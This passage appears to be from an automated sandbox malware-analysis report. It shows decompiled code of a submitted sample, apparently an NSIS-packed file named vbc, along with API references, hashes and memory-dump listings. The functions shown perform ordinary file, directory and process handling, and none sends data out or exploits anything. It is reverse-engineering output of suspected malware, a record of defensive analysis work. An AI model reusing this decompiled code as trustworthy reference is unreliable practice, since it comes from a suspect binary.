											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x79f734 =  *0x79f734 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                          0x0040337b
                                          0x00403384
                                          0x0040338d
                                          0x00403391
                                          0x0040339c
                                          0x0040339c
                                          0x004033a4
                                          0x004033ab
                                          0x004033bd
                                          0x004033c4
                                          0x00403469
                                          0x00403469
                                          0x00000000
                                          0x004033ca
                                          0x004033cd
                                          0x004033d9
                                          0x004033dd
                                          0x00403477
                                          0x00403477
                                          0x004033e3
                                          0x004033e6
                                          0x00403445
                                          0x0040344b
                                          0x0040344d
                                          0x0040344d
                                          0x0040345f
                                          0x00403467
                                          0x0040346e
                                          0x00403471
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004033e8
                                          0x004033eb
                                          0x00000000
                                          0x004033f1
                                          0x004033f6
                                          0x004033fd
                                          0x00403400
                                          0x00403402
                                          0x00403402
                                          0x0040340f
                                          0x00403419
                                          0x00000000
                                          0x00000000
                                          0x00403422
                                          0x00403429
                                          0x00403441
                                          0x0040346b
                                          0x0040346b
                                          0x0040342b
                                          0x0040342b
                                          0x0040342e
                                          0x00403431
                                          0x00403437
                                          0x0040343d
                                          0x00000000
                                          0x0040343f
                                          0x00000000
                                          0x0040343f
                                          0x0040343d
                                          0x00000000
                                          0x00403429
                                          0x00000000
                                          0x004033f6
                                          0x004033eb
                                          0x004033e6
                                          0x004033dd
                                          0x004033c4
                                          0x00403479
                                          0x0040347c

                                          APIs
                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 0040339C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID: 07y
                                          • API String ID: 973152223-1660179758
                                          • Opcode ID: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                                          • Instruction ID: 558639dd8831905cecc0235a21772d735375f1fafe9af626847c4dd8eee9aa20
                                          • Opcode Fuzzy Hash: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                                          • Instruction Fuzzy Hash: 73319330201218FFDF129FA5ED85D9E3F68EB00359F10803AF905E9190D778DA51DBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405D32 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 609 405d32-405d43 call 406139 612 405d73 609->612 613 405d45-405d4b 609->613 614 405d75-405d77 612->614 615 405d55 DeleteFileW 613->615 616 405d4d-405d53 RemoveDirectoryW 613->616 617 405d5b-405d5d 615->617 616->617 618 405d64-405d69 617->618 619 405d5f-405d62 617->619 618->612 620 405d6b-405d6d SetFileAttributesW 618->620 619->614 620->612
                                          C-Code - Quality: 41%
                                          			E00405D32(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406139(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                          0x00405d33
                                          0x00405d3e
                                          0x00405d43
                                          0x00405d73
                                          0x00000000
                                          0x00405d73
                                          0x00405d4a
                                          0x00405d4b
                                          0x00405d55
                                          0x00405d4d
                                          0x00405d4d
                                          0x00405d4d
                                          0x00405d5d
                                          0x00405d69
                                          0x00405d6d
                                          0x00405d6d
                                          0x00000000
                                          0x00405d5f
                                          0x00000000
                                          0x00405d61

                                          APIs
                                            • Part of subcall function 00406139: GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                                            • Part of subcall function 00406139: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                                          • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F14), ref: 00405D4D
                                          • DeleteFileW.KERNEL32(?,?,?,00000000,00405F14), ref: 00405D55
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: File$Attributes$DeleteDirectoryRemove
                                          • String ID:
                                          • API String ID: 1655745494-0
                                          • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                          • Instruction ID: 65d886778d981234f1bc095319bf1530848ff53bfe772b7143d7b60a17f83489
                                          • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                          • Instruction Fuzzy Hash: E1E0E531204EA056C7106B35AD0CF5B2A98EF86314F05893FF592B10D0D77888078AAE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406AE6 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 621 406ae6-406afe WaitForSingleObject 622 406b0e-406b10 621->622 623 406b00-406b0c call 406a77 WaitForSingleObject 622->623 624 406b12-406b25 GetExitCodeProcess 622->624 623->622
                                          C-Code - Quality: 100%
                                          			E00406AE6(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A77(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                                          0x00406af7
                                          0x00406b0e
                                          0x00406b02
                                          0x00406b0c
                                          0x00406b0c
                                          0x00406b19
                                          0x00406b25

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 00406B0C
                                          • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CodeExitProcess
                                          • String ID:
                                          • API String ID: 2567322000-0
                                          • Opcode ID: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                                          • Instruction ID: 2c972b7a35bd62db52b15041da2731f4b89024a3c017fe3bef96d42d01d66162
                                          • Opcode Fuzzy Hash: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                                          • Instruction Fuzzy Hash: 67E09271600218BBEB00AB54DD05E9E7F7EDB44700F110032F601F6190C6B1EE22DAA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403C2B Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 20COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 627 403c2b-403c3a 628 403c46-403c4e 627->628 629 403c3c-403c3f CloseHandle 627->629 630 403c50-403c53 CloseHandle 628->630 631 403c5a-403c66 call 403c88 call 405d7a 628->631 629->628 630->631 635 403c6b-403c6c 631->635
                                          C-Code - Quality: 100%
                                          			E00403C2B() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1); // executed
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C88();
				_t4 = E00405D7A(_t11, 0x7b6000, 7); // executed
				return _t4;
			}







                                          0x00403c2b
                                          0x00403c3a
                                          0x00403c3d
                                          0x00403c3f
                                          0x00403c3f
                                          0x00403c46
                                          0x00403c4e
                                          0x00403c51
                                          0x00403c53
                                          0x00403c53
                                          0x00403c53
                                          0x00403c5a
                                          0x00403c66
                                          0x00403c6c

                                          APIs
                                          • CloseHandle.KERNELBASE(FFFFFFFF), ref: 00403C3D
                                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 00403C51
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C30
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2962429428-4017390910
                                          • Opcode ID: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                                          • Instruction ID: 4491f7c80fa00ae2087dec4a459748e9e372b7f9a3145cafecdefc003a92e639
                                          • Opcode Fuzzy Hash: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                                          • Instruction Fuzzy Hash: F3E0863244471896D1347F7DAE4D9853B195F413327204326F178F20F0C7389AA74A99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 636 4015c1-4015d5 call 402da6 call 405fe8 641 401631-401634 636->641 642 4015d7-4015ea call 405f6a 636->642 644 401663-4022f6 call 401423 641->644 645 401636-401655 call 401423 call 40666e SetCurrentDirectoryW 641->645 649 401604-401607 call 405c1c 642->649 650 4015ec-4015ef 642->650 660 402c2a-402c39 644->660 661 40292e-402935 644->661 645->660 663 40165b-40165e 645->663 659 40160c-40160e 649->659 650->649 653 4015f1-4015f8 call 405c39 650->653 653->649 667 4015fa-4015fd call 405b9f 653->667 665 401610-401615 659->665 666 401627-40162f 659->666 661->660 663->660 669 401624 665->669 670 401617-401622 GetFileAttributesW 665->670 666->641 666->642 672 401602 667->672 669->666 670->666 670->669 672->659
                                          C-Code - Quality: 86%
                                          			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE8(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F6A(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C1C( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C39(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B9F( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040666E(0x7b4000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                          0x004015c1
                                          0x004015c9
                                          0x004015cc
                                          0x004015d1
                                          0x004015d5
                                          0x004015d7
                                          0x004015df
                                          0x004015e1
                                          0x004015e4
                                          0x004015ea
                                          0x00401604
                                          0x00401607
                                          0x004015ec
                                          0x004015ec
                                          0x004015ef
                                          0x00000000
                                          0x004015fa
                                          0x004015fd
                                          0x004015fd
                                          0x004015ef
                                          0x0040160e
                                          0x00401615
                                          0x00401624
                                          0x00401624
                                          0x00401617
                                          0x0040161a
                                          0x00401622
                                          0x00000000
                                          0x00000000
                                          0x00401622
                                          0x00401615
                                          0x00401627
                                          0x0040162b
                                          0x0040162c
                                          0x004015d7
                                          0x00401634
                                          0x00401663
                                          0x004022f1
                                          0x00401636
                                          0x00401638
                                          0x00401645
                                          0x0040164d
                                          0x00401655
                                          0x0040165b
                                          0x0040165b
                                          0x00401655
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                            • Part of subcall function 00405FE8: CharNextW.USER32(?), ref: 00405FF6
                                            • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                                            • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                            • Part of subcall function 00405B9F: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                                          • SetCurrentDirectoryW.KERNELBASE(?,007B4000,?,00000000,000000F0), ref: 0040164D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                          • String ID:
                                          • API String ID: 1892508949-0
                                          • Opcode ID: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                                          • Instruction ID: 957f66bc23545469dbc724fd3d157a479205f5e7ec4e330cdfccc87aa14dd729
                                          • Opcode Fuzzy Hash: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                                          • Instruction Fuzzy Hash: 3111E231408115EBCF217FA5CD4099E36A0EF15369B28493BFA01B22F1DA3E49829B5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406045 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E00406045(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040666E(0x7a4790, _a4);
				_t21 = E00405FE8(0x7a4790);
				if(_t21 != 0) {
					E004068F5(_t21);
					if(( *0x7a8ab8 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x7a4790 >> 1;
						while(1) {
							_t11 = lstrlenW(0x7a4790);
							_push(0x7a4790);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004069A4();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F89(0x7a4790);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F3D();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                          0x00406051
                                          0x0040605c
                                          0x00406060
                                          0x00406067
                                          0x00406073
                                          0x00406083
                                          0x00406085
                                          0x0040609d
                                          0x0040609e
                                          0x004060a5
                                          0x004060a6
                                          0x00000000
                                          0x00000000
                                          0x00406089
                                          0x00406090
                                          0x00406098
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406090
                                          0x004060a8
                                          0x004060ae
                                          0x00000000
                                          0x004060bc
                                          0x00406075
                                          0x0040607b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040607b
                                          0x00406062
                                          0x00000000

                                          APIs
                                            • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                                            • Part of subcall function 00405FE8: CharNextW.USER32(?), ref: 00405FF6
                                            • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                                            • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                                          • lstrlenW.KERNEL32(007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0,00000000), ref: 0040609E
                                          • GetFileAttributesW.KERNELBASE(007A4790,007A4790,007A4790,007A4790,007A4790,007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0), ref: 004060AE
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                          • String ID:
                                          • API String ID: 3248276644-0
                                          • Opcode ID: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                                          • Instruction ID: 38ed1c6f7611cbdad0e8a1dc3f16fb44af04154f1bcb09577380b12bcb23f66f
                                          • Opcode Fuzzy Hash: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                                          • Instruction Fuzzy Hash: 31F0282A148A5219D622B33A0D05ABF05458EC2354B0B063FFC53B12D1DF7C897385BF
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a8ad0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7a7a8c =  *0x7a7a8c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a8c, 0x7530,  *0x7a7a74), 0);
					}
				}
				return 0;
			}











                                          0x0040138a
                                          0x004013fa
                                          0x0040139b
                                          0x004013a0
                                          0x00000000
                                          0x00000000
                                          0x004013a2
                                          0x004013a3
                                          0x004013ad
                                          0x00000000
                                          0x00401404
                                          0x004013b0
                                          0x004013b7
                                          0x004013bd
                                          0x004013be
                                          0x004013c0
                                          0x004013c2
                                          0x004013b9
                                          0x004013b9
                                          0x004013ba
                                          0x004013ba
                                          0x004013c9
                                          0x004013cb
                                          0x004013f4
                                          0x004013f4
                                          0x004013c9
                                          0x00000000

                                          APIs
                                          • MulDiv.KERNEL32 ref: 004013E4
                                          • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                                          • Instruction ID: 0d0e525a89db022a3713d7d40a62d3a92fa7a1992dda9c0477917c3d4d329065
                                          • Opcode Fuzzy Hash: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                                          • Instruction Fuzzy Hash: 5901F432624220ABE7094B389D05B2A3698E751315F10C67FF851F79F1EA78CC02DB4C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405C51 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405C51(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

